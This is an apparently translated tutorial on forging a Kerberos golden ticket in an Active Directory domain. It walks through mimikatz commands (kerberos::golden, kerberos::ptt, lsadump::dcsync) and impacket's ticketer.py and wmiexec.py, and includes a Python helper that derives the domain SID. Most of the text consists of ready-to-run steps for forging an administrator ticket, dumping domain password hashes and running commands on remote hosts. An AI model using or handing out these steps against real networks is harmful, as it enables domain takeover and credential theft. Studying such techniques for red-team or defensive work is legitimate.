Principle
The idea behind the golden ticket is to use the hash of the krbtgt account to forge the contents of a TGT, changing the client identity and session key inside it, so that the TGS believes I am who I claim to be (and I generally claim to be an administrator). The fourth step of the protocol is mainly where the client's identity is verified.
The so-called golden ticket is the ticket for the TGS obtained in the second stage of Kerberos authentication, i.e. the TGT. This ticket is effectively an identity credential for the requester: if it can be forged, any identity can be forged, and the golden ticket is one way of doing so.
For the principles of the Kerberos protocol, please refer to: NTLM authentication, Kerberos authentication and PAC related knowledge.
Preconditions and operation steps
Preconditions
1. The hash of the krbtgt account
2. Local administrator rights
3. The SID of the domain (an ordinary user's SID is the domain SID followed by that user's RID; drop the final dash-separated component to get the domain SID)
4. Local administrator rights for any user in the domain
Steps
Clear existing tickets
kerberos::purge
Make the golden ticket
kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-4166986646-4168497534-2490551922 /krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi
Load the golden ticket
kerberos::ptt 1.kirbi
Test the result
lsadump::dcsync /domain:test.com /user:krbtgt
Implementation
Implementation using mimikatz
mimikatz download address
Suppose we have obtained, in some way, the krbtgt hash of the domain controller: d8d2ad72a119a8d418703f7a16580af6.
1. Open a cmd window with administrator rights
2. Use mimikatz
Step 1: escalate privileges and clear tickets
klist purge  # execute in cmd
privilege::Debug
kerberos::purge
kerberos::list
Step 2: Make the golden ticket
Obtain the domain SID. The current user's SID is S-1-5-21-3763276348-88739081-2848684050-1110, so the domain SID is S-1-5-21-3763276348-88739081-2848684050 (the trailing RID -1110 is dropped).
Execute the command:
kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-3763276348-88739081-2848684050 /krbtgt:d8d2ad72a119a8d418703f7a16580af6 /ticket:1.kirbi
After execution finishes, a 1.kirbi file is generated in the working directory.
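As an added illustration of the SID rule used in this step (my own example, not code from the original post or from mimikatz), the following Python splits an account SID into the domain SID and the RID, and checks whether two SIDs belong to the same domain. The SID values are the ones from this page.

```python
import re

# Shape of a domain-style SID: S-1-5-21-<sub1>-<sub2>-<sub3>[-<RID>]
# Three sub-authorities after "21" identify the domain; a fourth is the
# relative identifier (RID) of an account or group inside that domain.
_DOMAIN_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3,4}$")
_MAX_SUBAUTH = 0xFFFFFFFF  # each sub-authority is an unsigned 32-bit value


def split_sid(sid: str):
    """Return (domain_sid, rid) for a domain-style SID.

    If the input is already a domain SID (no RID), rid is None.
    Raises ValueError for well-known or malformed SIDs such as S-1-5-32-544.
    """
    sid = sid.strip()
    if not _DOMAIN_SID_RE.match(sid):
        raise ValueError(f"not a domain-style SID: {sid!r}")
    parts = sid.split("-")
    subs = [int(p) for p in parts[4:]]  # everything after S-1-5-21
    if any(s > _MAX_SUBAUTH for s in subs):
        raise ValueError(f"sub-authority out of 32-bit range: {sid!r}")
    if len(subs) == 3:
        return sid, None
    return "-".join(parts[:-1]), subs[-1]


def same_domain(sid_a: str, sid_b: str) -> bool:
    """True when both SIDs share the same domain identifier."""
    return split_sid(sid_a)[0] == split_sid(sid_b)[0]


if __name__ == "__main__":
    # Value quoted on this page as the current user's SID
    user_sid = "S-1-5-21-3763276348-88739081-2848684050-1110"
    domain_sid, rid = split_sid(user_sid)
    print(domain_sid, rid)  # S-1-5-21-3763276348-88739081-2848684050 1110
```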
Step 3: Use the golden ticket
First, let's see whether the dcsync command can be used. This command requires domain controller privileges; its function is to export the password hashes of every account in the domain. Naturally the result is a failure,
because we do not hold the domain controller's "ID card", i.e. a TGT.
Now we import the freshly forged TGT into the system and test again:
kerberos::ptt 1.kirbi
lsadump::dcsync /domain:test.com /user:krbtgt
Some pitfalls encountered
After creating the ticket, executing lsadump::dcsync /domain:test.com /user:krbtgt reports an error. After studying it for a long time, I found that if you simply wait a few minutes and then run the command again it succeeds, or you can quit mimikatz and start it again. I do not know the reason for this.
This kind of ticket is stored only in the command-line window that has administrator rights. If you switch to another command-line window to execute commands, you will find that the ticket is not there.
Implement with impacket
The principle is the same as with mimikatz; only the tools differ.
Implementation
Step 1: Open a command-line window with administrator rights and clear the tickets
Step 2: Make the ccache file
python ticketer.py -nthash d8d2ad72a119a8d418703f7a16580af6 -domain-sid S-1-5-21-3763276348-88739081-2848684050 -domain test.com administrator
Step 3: Change the environment variables
set KRB5CCNAME=C:\Users\zhangsan\Desktop\impacket-examples-windows-master\administrator.ccache
Step 4: Verify the results
python wmiexec.py test.com/administrator@yukong -k -no-pass
Summary
Making tickets with impacket has certain limitations. After the ticket is made, it does not show up in the klist cache, and there is no way to establish a connection with net use \\ip\admin$. However, impacket's own tools can be used to control the designated host remotely, using this command format:
xxxx.py domain/username@hostname -k -no-pass
The domain here must match the domain value shown by systeminfo.
The hostname can be found with the net view command, with nbtstat -A ip, or with ping -a ip. The ping -a command is recommended.
In the example above, test.com is the domain name and yukong is the host name.
What is an FQDN?
FQDN is the abbreviation of Fully Qualified Domain Name: the complete domain name that DNS resolves to an IP address when a host is accessed. FQDN = Hostname + DomainName. For example, if a company registers the domain name comp.com and has a host named web, then web.comp.com can be used to obtain that host's IP. If two hosts named cmail and oa provide mail and OA services, the following FQDNs can be used:
cmail.comp.com
oa.comp.com
For more on using impacket, please see the following article:
Summary of the use of impacket